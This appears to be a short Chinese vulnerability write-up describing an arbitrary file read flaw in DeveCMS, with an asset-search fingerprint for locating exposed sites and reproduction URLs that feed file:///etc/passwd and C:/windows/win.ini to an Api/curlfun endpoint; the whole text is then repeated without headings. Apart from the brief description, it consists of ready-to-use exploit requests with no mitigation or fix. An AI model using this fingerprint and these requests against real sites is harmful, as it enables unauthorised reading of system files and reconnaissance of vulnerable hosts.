DeveCMS存在任意文件读取漏洞
一、漏洞描述
DeveCMS存在任意文件读取漏洞
二、影响版本
DeveCMS
三、资产测绘
"/static/index/css/ionic.css" && "devework.com"
四、漏洞复现
/index.php/index/Api/curlfun?url=file:///etc/passwd
/index.php/index/Api/curlfun?url=file:///C:/windows/win.ini
DeveCMS存在任意文件读取漏洞
DeveCMS
"/static/index/css/ionic.css" && "devework.com"
/index.php/index/Api/curlfun?url=file:///etc/passwd
/index.php/index/Api/curlfun?url=file:///C:/windows/win.ini